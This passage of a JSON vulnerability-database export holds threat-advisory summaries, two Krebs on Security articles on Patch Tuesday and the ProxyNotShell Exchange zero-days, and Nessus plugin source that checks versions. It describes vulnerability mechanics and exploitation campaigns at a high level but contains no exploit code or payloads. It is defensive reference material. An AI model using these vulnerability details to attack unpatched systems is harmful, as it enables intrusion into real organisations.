The bug exists because amavis insecurely falls back to cpio to extract files if the pax package is not installed on the system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-11T07:28:31", "type": "hivepro", "title": "Zero-Day Remote Code Execution Vulnerability in Zimbra Collaboration Suite", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41352"], "modified": "2022-10-11T07:28:31", "id": "HIVEPRO:33F7ACF184167B2BC236A12082041131", "href": "https://www.hivepro.com/zero-day-remote-code-execution-vulnerability-in-zimbra-collaboration-suite/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-02-01T06:40:26", "description": "Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary CVE-2022-34689 is a critical vulnerability in Windows CryptoAPI that was publicly announced by Microsoft in October 2022. 
The vulnerability allows an attacker to masquerade as a legitimate entity by exploiting the assumption that the certificate cache index key, based on MD5, is collision-free.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2023-02-01T05:51:58", "type": "hivepro", "title": "Proof-of-concept released for Windows CryptoAPI vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-34689"], "modified": "2023-02-01T05:51:58", "id": "HIVEPRO:E2550D26AC21BB6F731E41DD4D48AFA8", "href": "https://www.hivepro.com/proof-of-concept-released-for-windows-cryptoapi-vulnerability/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-28T12:53:24", "description": "Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary Tailgate campaign is currently being carried out by the threat actors Hafnium and OilRig. The goal of this campaign is to exploit vulnerabilities in Fortinet. 
Recently discovered vulnerability CVE-2022-40684, which has been attributed to Fortinet Products, is among the exploited vulnerabilities.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-28T08:52:38", "type": "hivepro", "title": "Threat Actors launch a campaign to exploit vulnerability in Fortinet", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-40684"], "modified": "2022-10-28T08:52:38", "id": "HIVEPRO:5EF44DD9474A0410F4E4758ABB19D17A", "href": "https://www.hivepro.com/threat-actors-launch-a-campaign-to-exploit-vulnerability-in-fortinet/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-11T10:11:40", "description": "Threat Level Vulnerability Report For a detailed threat advisory, download the pdf file here Summary FortiOS and FortiProxy has an authentication bypass vulnerability, CVE-2022-40684, that could allow remote attackers access to the administrative interface.", "cvss3": {}, "published": "2022-10-11T07:22:07", "type": "hivepro", "title": "Vulnerability in Fortinet allows authentication bypass", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-40684"], "modified": "2022-10-11T07:22:07", "id": "HIVEPRO:621DD8CA375634712F01438EF8C1AE13", "href": "https://www.hivepro.com/vulnerability-in-fortinet-allows-authentication-bypass/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-09-30T12:04:33", "description": "Threat Level Vulnerability Report For a detailed threat advisory, download the pdf file here Summary A zero-day vulnerability in the User Portal and WebAdmin of Sophos Firewall has been tracked as 
CVE-2022-3236. This vulnerability is being used by unknown attackers to target organizations in South Asia.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T10:12:52", "type": "hivepro", "title": "Sophos Zero-day vulnerability becomes target for attackers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-3236"], "modified": "2022-09-30T10:12:52", "id": "HIVEPRO:CCB5F51160D6B20ECA6FFFB5297C4704", "href": "https://www.hivepro.com/sophos-zero-day-vulnerability-becomes-target-for-attackers/", "cvss": {"score": 0.0, "vector": "NONE"}}], "krebs": [{"lastseen": "2022-10-12T04:30:32", "description": "**Microsoft** today released updates to fix at least 85 security holes in its **Windows** operating systems and related software, including a new zero-day vulnerability in all supported versions of Windows that is being actively exploited. However, noticeably absent from this month's Patch Tuesday are any updates to address a pair of zero-day flaws being exploited this past month in **Microsoft Exchange Server**.\n\n\n\nThe new zero-day flaw -- [CVE-2022-41033](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41033>) -- is an "elevation of privilege" bug in the Windows COM+ event service, which provides system notifications when users logon or logoff. 
Microsoft says the flaw is being actively exploited, and that it was reported by an anonymous individual.\n\n"Despite its relatively low score in comparison to other vulnerabilities patched today, this one should be at the top of everyone's list to quickly patch," said **Kevin Breen**, director of cyber threat research at **Immersive Labs**. "This specific vulnerability is a local privilege escalation, which means that an attacker would already need to have code execution on a host to use this exploit. Privilege escalation vulnerabilities are a common occurrence in almost every security compromise. Attackers will seek to gain SYSTEM or domain-level access in order to disable security tools, grab credentials with tools like Mimikatz and move laterally across the network."\n\nIndeed, **Satnam Narang**, senior staff research engineer at **Tenable**, notes that almost half of the security flaws Microsoft patched this week are elevation of privilege bugs.\n\nSome privilege escalation bugs can be particularly scary. One example is [CVE-2022-37968](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37968>), which affects organizations running **Kubernetes** clusters on **Azure** and earned a CVSS score of 10.0 -- the most severe score possible.\n\nMicrosoft says that to exploit this vulnerability an attacker would need to know the randomly generated DNS endpoint for an Azure Arc-enabled Kubernetes cluster. But that may not be such a tall order, says Breen, who notes that a number of free and commercial DNS discovery services now make it easy to find this information on potential targets.\n\nLate last month, Microsoft acknowledged that attackers were [exploiting two previously unknown vulnerabilities in Exchange Server](<https://krebsonsecurity.com/2022/09/microsoft-two-new-0-day-flaws-in-exchange-server/>). 
Paired together, the two flaws are known as "ProxyNotShell" and they can be chained to allow remote code execution on Exchange Server systems.\n\nMicrosoft said it was expediting work on official patches for the Exchange bugs, and it urged affected customers to enable certain settings to mitigate the threat from the attacks. However, those mitigation steps were soon shown to be ineffective, and Microsoft has been [adjusting them on a daily basis nearly each day since then](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>).\n\nThe lack of Exchange patches leaves a lot of Microsoft customers exposed. Security firm **Rapid7** said that as of early September 2022 the company observed more than 190,000 potentially vulnerable instances of Exchange Server exposed to the Internet.\n\n"While Microsoft confirmed the zero-days and issued guidance faster than they have in the past, there are still no patches nearly two weeks out from initial disclosure," said **Caitlin Condon**, senior manager of vulnerability research at Rapid7. "Despite high hopes that today's Patch Tuesday release would contain fixes for the vulnerabilities, Exchange Server is conspicuously missing from the initial list of October 2022 security updates. Microsoft\u2019s recommended rule for blocking known attack patterns has been bypassed multiple times, emphasizing the necessity of a true fix."\n\nAdobe also released [security updates to fix 29 vulnerabilities](<https://helpx.adobe.com/security.html>) across a variety of products, including **Acrobat** and **Reader**, **ColdFusion**, **Commerce** and **Magento**. 
Adobe said it is not aware of active attacks against any of these flaws.\n\nFor a closer look at the patches released by Microsoft today and indexed by severity and other metrics, check out the [always-useful Patch Tuesday roundup](<https://isc.sans.edu/forums/diary/October%202022%20Microsoft%20Patch%20Tuesday/29138/>) from the **SANS Internet Storm Center**. And it\u2019s not a bad idea to hold off updating for a few days until Microsoft works out any kinks in the updates: [AskWoody.com](<https://www.askwoody.com/>) usually has the lowdown on any patches that may be causing problems for Windows users.\n\nAs always, please consider backing up your system or at least your important documents and data before applying system updates. And if you run into any problems with these updates, please drop a note about it here in the comments.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-11T21:06:23", "type": "krebs", "title": "Microsoft Patch Tuesday, October 2022 Edition", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-37968", "CVE-2022-41033"], "modified": "2022-10-11T21:06:23", "id": "KREBS:04BF4A7775A9C0B7DE1A20C71586245A", "href": "https://krebsonsecurity.com/2022/10/microsoft-patch-tuesday-october-2022-edition/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-03T06:04:32", "description": "**Microsoft Corp.** is investigating reports that attackers are exploiting two previously unknown vulnerabilities in **Exchange Server**, a technology many organizations rely on to send and receive email. 
Microsoft says it is expediting work on software patches to plug the security holes. In the meantime, it is urging a subset of Exchange customers to enable a setting that could help mitigate ongoing attacks.\n\n\n\nIn [customer guidance](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) released Thursday, Microsoft said it is investigating two reported zero-day flaws affecting Microsoft Exchange Server 2013, 2016, and 2019. [CVE-2022-41040](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-41040>), is a Server-Side Request Forgery (SSRF) vulnerability that can enable an authenticated attacker to remotely trigger the second zero-day vulnerability -- [CVE-2022-41082](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41082>) -- which allows remote code execution (RCE) when **PowerShell** is accessible to the attacker.\n\nMicrosoft said **Exchange Online** has detections and mitigation in place to protect customers. Customers using _on-premises_ Microsoft Exchange servers are urged to review the mitigations suggested in the security advisory, which Microsoft says should block the known attack patterns.\n\nVietnamese security firm **GTSC** on Thursday [published a writeup on the two Exchange zero-day flaws](<https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>), saying it first observed the attacks in early August being used to drop "webshells." These web-based backdoors offer attackers an easy-to-use, password-protected hacking tool that can be accessed over the Internet from any browser.\n\n"We detected webshells, mostly obfuscated, being dropped to Exchange servers," GTSC wrote. "Using the user-agent, we detected that the attacker uses Antsword, an active Chinese-based opensource cross-platform website administration tool that supports webshell management. 
We suspect that these come from a Chinese attack group because the webshell codepage is 936, which is a Microsoft character encoding for simplified Chinese."\n\nGTSC's advisory includes details about post-compromise activity and related malware, as well as steps it took to help customers respond to active compromises of their Exchange Server environment. But the company said it would withhold more technical details of the vulnerabilities for now.\n\nIn March 2021, hundreds of thousands of organizations worldwide had their email stolen and multiple backdoor webshells installed, all thanks to [four zero-day vulnerabilities in Exchange Server](<https://krebsonsecurity.com/2021/03/at-least-30000-u-s-organizations-newly-hacked-via-holes-in-microsofts-email-software/>). \n\nGranted, the zero-day flaws that powered that debacle were far more critical than the two detailed this week, and there are no signs yet that exploit code has been publicly released (that will likely change soon). But part of what made last year's Exchange Server mass hack so pervasive was that vulnerable organizations had little or no advance notice on what to look for before their Exchange Server environments were completely owned by multiple attackers. \n\nMicrosoft is quick to point out that these zero-day flaws require an attacker to have a valid username and password for an Exchange user, but this may not be such a tall order for the hackers behind these latest exploits against Exchange Server. \n\n**Steven Adair** is president of [Volexity](<https://www.volexity.com>), the Virginia-based cybersecurity firm that was among the first to sound the alarm about the Exchange zero-days targeted in the 2021 mass hack. Adair said GTSC's writeup includes an Internet address used by the attackers that Volexity has tied with high confidence to a China-based hacking group that has recently been observed phishing Exchange users for their credentials. 
\n\nIn February 2022, Volexity [warned](<https://www.volexity.com/blog/2022/02/03/operation-emailthief-active-exploitation-of-zero-day-xss-vulnerability-in-zimbra/>) that this same Chinese hacking group was behind the mass exploitation of a zero-day vulnerability in the **Zimbra Collaboration Suite**, which is a competitor to Microsoft Exchange that many enterprises use to manage email and other forms of messaging. \n\nIf your organization runs Exchange Server, please consider reviewing [the Microsoft mitigations](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) and [the GTSC post-mortem](<https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) on their investigations.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T16:51:57", "type": "krebs", "title": "Microsoft: Two New 0-Day Flaws in Exchange Server", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T16:51:57", "id": "KREBS:6E25B247DFBFC9267C00F36CE0695768", "href": "https://krebsonsecurity.com/2022/09/microsoft-two-new-0-day-flaws-in-exchange-server/", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2023-01-13T00:56:38", "description": "The Microsoft Exchange Server installed on the remote host is potentially affected by multiple zero-day vulnerabilities, dubbed ProxyNotShell:\n\n - An unspecified authenticated server-side request forgery (SSRF) vulnerability. 
(CVE-2022-41040)\n\n - An unspecified authenticated remote code execution (RCE) vulnerability when PowerShell is accessible to the attacker. (CVE-2022-41082)\n\nPlease refer to Microsoft for guidance on mitigations for these vulnerabilities.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-05T00:00:00", "type": "nessus", "title": "Microsoft Exchange Server October 2022 Zero-day Vulnerabilities (ProxyNotShell)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2023-01-12T00:00:00", "cpe": ["cpe:/a:microsoft:exchange_server"], "id": "SMB_NT_MS22_OCT_EXCHANGE_ZERODAY.NASL", "href": "https://www.tenable.com/plugins/nessus/165705", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc. 
\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(165705);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\"CVE-2022-41040\", \"CVE-2022-41082\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/10/21\");\n script_xref(name:\"IAVA\", value:\"2022-A-0474-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0031\");\n\n script_name(english:\"Microsoft Exchange Server October 2022 Zero-day Vulnerabilities (ProxyNotShell)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft Exchange Server installed on the remote host is potentially affected by multiple zero-day vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft Exchange Server installed on the remote host is potentially affected by multiple zero-day\nvulnerabilities, dubbed ProxyNotShell:\n\n - An unspecified authenticated server-side request forgery (SSRF) vulnerability. (CVE-2022-41040)\n\n - An unspecified authenticated remote code execution (RCE) vulnerability when PowerShell is accessible to the\n attacker. 
(CVE-2022-41082)\n\nPlease refer to Microsoft for guidance on mitigations for these vulnerabilities.\");\n # https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?57fc3035\");\n # https://www.tenable.com/blog/cve-2022-41040-and-cve-2022-41082-proxyshell-variant-exploited-in-the-wild\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c7cacb5\");\n script_set_attribute(attribute:\"see_also\", value:\"https://community.tenable.com/s/feed/0D53a00008oIvkYCAS\");\n script_set_attribute(attribute:\"solution\", value:\n\"Contact Microsoft for patching guidance.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-41082\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Exchange ProxyNotShell RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/10/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:exchange_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ms_bulletin_checks_possible.nasl\", \"microsoft_exchange_installed.nbin\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('vcf_extras_microsoft.inc');\n\nvar app_info = vcf::microsoft::exchange::get_app_info();\n\nvar constraints =\n[\n {\n 'product' : '2013',\n 'cu': 23,\n 'unsupported_cu': 22,\n 'fixed_version': '15.0.1497.42.1',\n 'fixed_display': 'Contact Microsoft for patching guidance.'\n },\n {\n 'product' : '2016',\n 'cu': 22,\n 'unsupported_cu': 21,\n 'fixed_version': '15.1.2375.32.1',\n 'fixed_display': 'Contact Microsoft for patching guidance.'\n },\n {\n 'product': '2016',\n 'cu': 23,\n 'unsupported_cu': 21,\n 'fixed_version': '15.1.2507.13.1',\n 'fixed_display': 'Contact Microsoft for patching guidance.'\n },\n {\n 'product' : '2019',\n 'cu': 11,\n 'unsupported_cu': 10,\n 'fixed_version': '15.2.986.36',\n 'fixed_display': 'Contact Microsoft for patching guidance.'\n },\n {\n 'product' : '2019',\n 'cu': 12,\n 'unsupported_cu': 10,\n 'fixed_version': '15.2.1118.15.1',\n 'fixed_display': 'Contact Microsoft for patching guidance.'\n }\n];\n\nvcf::microsoft::exchange::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-09T02:44:58", "description": "This plugin detects the potential presence of a web shell in selected directories and this can be indicative that the host might have been exploited with CVE-2022-41040 / CVE-2022-41082. 
It is recommended that the results are manually verified and appropriate remediation actions taken.\n\nNote that Nessus has not tested for this issue but has instead looked for files that could potentially indicate compromise.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-03T00:00:00", "type": "nessus", "title": "Potential exposure to Microsoft Exchange CVE-2022-41040 / CVE-2022-41082 Exploit", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2023-03-08T00:00:00", "cpe": ["cpe:/a:microsoft:exchange_server"], "id": "EXCHANGE_CVE-2022-41040_IOC.NBIN", "href": "https://www.tenable.com/plugins/nessus/165629", "sourceData": "Binary data exchange_cve-2022-41040_ioc.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-10T19:35:03", "description": "The Microsoft Office Products are missing security updates. They are, therefore, affected by multiple vulnerabilities:\n\n - Remote code execution vulnerabilities. An attacker can exploit these to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-38048, CVE-2022-41031)\n\n - An information disclosure vulnerability in Excel. An attacker who exploited the vulnerability could use the information together with other vulnerabilities in order to compromise the user\u2019s computer or data. 
(CVE-2022-41043)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-13T00:00:00", "type": "nessus", "title": "Security Updates for Microsoft Office Products (Oct 2022) (macOS)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-38048", "CVE-2022-41031", "CVE-2022-41043"], "modified": "2022-11-29T00:00:00", "cpe": ["cpe:/a:microsoft:office"], "id": "MACOS_MS22_OCT_OFFICE.NASL", "href": "https://www.tenable.com/plugins/nessus/166102", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc. \n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(166102);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/11/29\");\n\n script_cve_id(\"CVE-2022-38048\", \"CVE-2022-41031\", \"CVE-2022-41043\");\n script_xref(name:\"IAVA\", value:\"2022-A-0412-S\");\n\n script_name(english:\"Security Updates for Microsoft Office Products (Oct 2022) (macOS)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft Office Products are affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft Office Products are missing security updates. They are, therefore, affected by multiple \nvulnerabilities:\n\n - Remote code execution vulnerabilities. An attacker can exploit these to bypass authentication and \n execute unauthorized arbitrary commands. 
(CVE-2022-38048, CVE-2022-41031)\n\n - An information disclosure vulnerability in Excel. An attacker who exploited the vulnerability could use \n the information together with other vulnerabilities in order to compromise the user\u2019s computer or data. \n (CVE-2022-41043)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n # https://docs.microsoft.com/en-us/officeupdates/update-history-office-for-mac\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?43ed1b90\");\n # https://learn.microsoft.com/en-us/officeupdates/release-notes-office-for-mac#october-11-2022\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2b57ae29\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Microsoft Office for Mac.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-41031\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/10/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/10/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:office\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n 
script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_office_installed.nbin\");\n script_require_keys(\"Host/MacOSX/Version\");\n script_require_ports(\"installed_sw/Microsoft Outlook\", \"installed_sw/Microsoft Excel\", \"installed_sw/Microsoft Word\", \"installed_sw/Microsoft PowerPoint\", \"installed_sw/Microsoft OneNote\");\n\n exit(0);\n}\n\ninclude('vcf_extras_office.inc');\n\nvar apps = make_list('Microsoft Outlook', 'Microsoft Excel', 'Microsoft Word',\n 'Microsoft PowerPoint','Microsoft OneNote');\n\nvar app_info = vcf::microsoft::office_for_mac::get_app_info(apps:apps);\n\nvar constraints = [\n {'min_version':'16.17.0', 'fixed_version':'16.66', 'fixed_display':'16.66 (22100900)'}\n];\n\nvcf::microsoft::office_for_mac::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE,\n os_min_lvl:'10.15.0'\n);", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-09T17:10:38", "description": "The remote host is running a version of ManageEngine Access Manager Plus prior to 4.3 Build 4303. 
It is, therefore, affected by an authenticated remote code execution vulnerability.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-12T00:00:00", "type": "nessus", "title": "ManageEngine Access Manager Plus < 4.3 Build 4303 RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-35405"], "modified": "2023-01-17T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_access_manager_plus"], "id": "MANAGEENGINE_ACCESS_MANAGER_PLUS_4303.NASL", "href": "https://www.tenable.com/plugins/nessus/166059", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(166059);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\"CVE-2022-35405\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/10/13\");\n\n script_name(english:\"ManageEngine Access Manager Plus < 4.3 Build 4303 RCE\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by an authenticated remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of ManageEngine Access Manager Plus prior to 4.3 Build 4303. 
